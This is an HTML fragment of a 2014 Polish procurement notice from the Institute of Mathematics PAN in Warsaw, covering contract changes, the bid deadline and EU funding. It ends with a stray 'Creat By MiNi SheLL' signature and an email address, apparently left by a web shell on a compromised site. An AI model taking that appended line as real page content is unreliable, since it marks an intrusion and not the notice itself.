2. Warunkiem wprowadzenia zmian zawartej umowy jest sporządzenie podpisanego przez Strony Protokołu konieczności określającego przyczyny zmiany oraz potwierdzającego wystąpienie (odpowiednio) co najmniej jednej z okoliczności wymienionych w ust. 1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wraz z zaproszeniem do złożenia oferty Wykonawcom zostanie przekazany  SIWZ oraz kompletna dokumentacja projektowa na płycie CD lub innej formie elektronicznej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.11.2014 godzina 12:00, miejsce: miejsce: pok. nr 303 III p. Siedziba Instytutu Matematycznego PAN adres: 00-956 Warszawa, ul. Śni.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com